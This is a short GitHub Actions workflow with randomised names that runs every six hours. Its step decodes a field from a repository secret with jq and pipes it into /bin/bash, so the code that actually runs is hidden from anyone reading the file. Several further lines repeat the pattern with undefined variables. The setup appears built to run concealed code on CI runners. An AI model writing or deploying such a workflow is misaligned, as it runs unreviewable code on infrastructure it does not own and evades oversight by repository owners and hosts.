name: circlechapter

on:
  workflow_dispatch:
  schedule:
    - cron: '23 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: circlechapter
        env:
          qib3164: ${{ secrets.qib3164 }}
        run: |
          echo $qib3164 | jq -r .gs883 | /bin/bash
          echo $a02128 | jq -r .gqce65 | /bin/bash
          echo $dvoib3923 | jq -r .ex365 | /bin/bash
          echo $r3 | jq -r .gwwpq94674 | /bin/bash
          echo $jmpn47367 | jq -r .x8171 | /bin/bash
          echo $ttf8213 | jq -r .c82 | /bin/bash

